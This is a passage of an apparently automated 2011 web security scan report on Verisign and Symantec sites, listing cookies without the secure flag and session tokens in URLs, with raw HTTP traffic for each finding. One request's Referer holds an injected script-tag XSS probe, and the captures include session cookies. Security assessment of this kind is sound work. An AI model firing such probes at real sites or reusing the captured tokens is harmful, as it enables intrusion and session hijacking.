User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4605
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi
...[SNIP]...

6.58. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/trustcenter_product_selector.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 19769
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro
...[SNIP]...

6.59. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/utility.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/utility.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8013
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;}
if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)
...[SNIP]...

6.60. https://trust-center.verisign.com/rcm/verisign/style/brand.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/brand.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/brand.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 7437
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

@import "vrsn.css";
#vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;}
#vrsn_standard_bar_footer{border-top:1px solid #EDEDEE
...[SNIP]...

6.61. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/capture_payment.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/capture_payment.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2075
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*import from capture_payment.css - Coakley 10_5_2010 */
.radio_button {width:180px;}
.blurb {padding-left:5px;padding-bottom:10px;}
#tax_exemption_section {margin-left:35px;}
.content_line { position
...[SNIP]...

6.62. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/minimal_form.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/minimal_form.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3324
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#quick_signin_box {position:relative;top:0px;margin:0px;}
.minimal-form-gray, .minimal-form-gray * {background-color:gray;}
.minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t
...[SNIP]...

6.63. https://trust-center.verisign.com/rcm/verisign/style/module.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/module.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/module.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 698
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;}
#ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po
...[SNIP]...

6.64. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/product_selector.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/product_selector.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9496
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#comparison_chart_panel{position:absolute;right:20px;top:0;}
#product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;
...[SNIP]...

6.65. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/vrsn.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/vrsn.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 30719
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0}
a:link,a:visited{color:#1446A8;text-decoration:underline}
h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}
...[SNIP]...

6.66. https://www.verisign.com/assets/visual-sciences/vip/zig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/assets/visual-sciences/vip/zig.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/visual-sciences/vip/zig.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://idprotect.verisign.com/toolbar/activate.v
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:55 GMT
Server: Apache
Set-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT
Accept-Ranges: bytes
Content-Length: 2602
Expires: Sun, 09 Oct 2011 21:47:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

//REFERENCE PAGE TAG
var ct = "<img src=";
var cd = "//www.verisign.com"; //this should contain the domain of the web site
var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai
...[SNIP]...

6.67. https://www4.symantec.com/Vrt/wl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www4.symantec.com
Path:	/Vrt/wl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

SYMC_TRANS_ID=69836485@@1315604068690; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Vrt/wl?tu_id=akMg1303300545922330202 HTTP/1.1
Host: www4.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315621972496-New%7C1336357972496%3B%20event69%3Devent69%7C1336357972499%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:34:28 GMT
Content-type: text/html
X-atg-version: ATGPlatform/2006.3p3 [ DASLicense/0 DPSLicense/0 ]
Set-cookie: SYMC_TRANS_ID=69836485@@1315604068690; path=/
Location: https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

7. Session token in URL previous next
There are 15 instances of this issue:

https://idprotect.verisign.com/images/favicon.ico
https://idprotect.verisign.com/kaptcha.jpg
https://idprotect.verisign.com/scripts/global.js
https://idprotect.verisign.com/toolbar/activate.v
http://m.verisign.com/home.v
http://mbox3.offermatica.com/m2/verisign/mbox/standard
http://mbox3.offermatica.com/m2/verisign/ubox/image
http://player.ooyala.com/sas/authorized
https://renewals.symantec.com/renewals/images/icon-pop-up.gif
http://sales.liveperson.net/hc/2735064/
https://securitycenter.verisign.com/celp/enroll/retail
http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard
https://trust-center.verisign.com/process/retail/trust_product_selector
http://vipmobile.verisign.com/images/favicon.ico
https://vipmobile.verisign.com/home.v

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

7.1. https://idprotect.verisign.com/images/favicon.ico previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://idprotect.verisign.com
Path:	/images/favicon.ico

Issue detail

The URL in the request appears to contain a session token within the query string:

https://idprotect.verisign.com/images/favicon.ico;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Request

GET /images/favicon.ico;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:45:45 GMT
Server: Apache
Location: https://idprotect.verisign.com/images/favicon.ico
Content-Length: 330
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.2. https://idprotect.verisign.com/kaptcha.jpg previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://idprotect.verisign.com
Path:	/kaptcha.jpg

Issue detail

The URL in the request appears to contain a session token within the query string:

https://idprotect.verisign.com/kaptcha.jpg;jsessionid=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc

Request

GET /kaptcha.jpg;jsessionid=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://idprotect.verisign.com/toolbar/activate.v
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive
Cookie: JSESSIONID=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc

Response

HTTP/1.0 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:49:00 GMT
Server: Apache
Location: https://idprotect.verisign.com/kaptcha.jpg
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.3. https://idprotect.verisign.com/scripts/global.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://idprotect.verisign.com
